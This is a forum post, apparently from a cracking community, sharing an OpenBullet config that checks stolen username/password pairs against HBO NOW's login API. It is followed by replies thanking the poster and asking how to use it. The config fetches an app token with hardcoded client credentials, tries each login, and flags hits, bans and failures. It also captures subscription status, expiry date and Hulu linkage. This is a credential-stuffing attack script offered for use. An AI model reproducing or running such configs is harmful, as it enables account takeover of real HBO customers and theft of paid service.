sYdr1b 21 [hide] FUNCTION RandomNum 0 9999 -> VAR "RANDOM" REQUEST POST "https://comet.api.hbo.com/tokens" CONTENT "{\"client_id\":\"7e278f74-d580-4292-b3a9-f7a023e5ca03\",\"client_secret\":\"7e278f74-d580-4292-b3a9-f7a023e5ca03\",\"scope\":\"browse video_playback_free account_registration\",\"grant_type\":\"client_credentials\",\"deviceSerialNumber\":\"b1c15492-7d2b-4457-bf91-e018ebd7\",\"clientDeviceData\":{\"paymentProviderCode\":\"apple\"}}" CONTENTTYPE "application/json" HEADER "User-Agent: HBO%20NOW/21.0.0.161 CFNetwork/897.15 Darwin/17.5.0" HEADER "Pragma: no-cache" HEADER "Accept: application/vnd.hbo.v9.full+json" HEADER "Host: comet.api.hbo.com" HEADER "X-Hbo-Client-Version: Hadron/21.0.0.161 ios (IPHONE/12.0.1)" HEADER "Accept-Language: en-us" HEADER "Accept-Encoding: br, gzip, deflate" PARSE " " JSON "access_token" Recursive=False -> VAR "TOKEN" REQUEST POST "https://comet.api.hbo.com/tokens" CONTENT "{\"grant_type\":\"user_name_password\",\"scope\":\"browse video_playback device elevated_account_management\",\"username\":\"\",\"password\":\"\"}" CONTENTTYPE "application/json" HEADER "User-Agent: HBO%20NOW/21.0.0.161 CFNetwork/897.15 Darwin/17.5.0" HEADER "Pragma: no-cache" HEADER "Accept: application/vnd.hbo.v9.full+json" HEADER "Host: comet.api.hbo.com" HEADER "X-Hbo-Client-Version: Hadron/21.0.0.161 ios (IPHONE/12.0.1)" HEADER "Connection: keep-alive" HEADER "Accept-Language: en-us" HEADER "Authorization: Bearer " HEADER "Accept-Encoding: br, gzip, deflate" KEYCHECK BanOnToCheck=False KEYCHAIN Ban OR KEY "" Contains "403" KEYCHAIN Failure OR KEY "" Contains "401" KEYCHAIN Success OR KEY "access_token" PARSE " " JSON "access_token" Recursive=False -> VAR "TOKEN2" REQUEST POST "https://comet.api.hbo.com/content" CONTENT "[{\"id\":\"urn:hbo:billing-status:mine\"}]" CONTENTTYPE "application/json" HEADER "User-Agent: HBO%20NOW/21.0.0.161 CFNetwork/897.15 Darwin/17.5.0" HEADER "Pragma: no-cache" HEADER "Accept: application/vnd.hbo.v9.full+json" HEADER "Host: comet.api.hbo.com" HEADER "X-Hbo-Client-Version: Hadron/21.0.0.161 ios (IPHONE/12.0.1)" HEADER "Connection: keep-alive" HEADER "Accept-Language: en-us" HEADER "Authorization: Bearer " HEADER "Accept-Encoding: br, gzip, deflate" KEYCHECK BanOnToCheck=False KEYCHAIN Custom "FREE" OR KEY "You’re not subscribed to HBO NOW" KEY "expired" PARSE " " LR "nYour" "(" Recursive=False -> CAP "EXPIRE DATE" PARSE " " LR "\": \"Your" "(" Recursive=False -> CAP "HULU LINKED SUB?" [/hide] Quote Share this post Link to post Share on other sites
mirkops 4 thanks let me see ..!! how we using this ..? Quote Share this post Link to post Share on other sites
bdavis732 4 Thank you for sharing your hard work brother :hype: Quote Share this post Link to post Share on other sites
MASSIMOUZIKA 3 MERCIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII Quote Share this post Link to post Share on other sites
nigh 0 This is my first time using OpenBullet. So I want to see how the configs are created. I have no particular reason to see HBO but it was the first one the list. Thanks for sharing this one. Quote Share this post Link to post Share on other sites
mirkops1 8 thanks so much ..!! let us see ..! Quote Share this post Link to post Share on other sites
blindfreak132 0 Thanks for the share brother! Hopefully it's working! Quote Share this post Link to post Share on other sites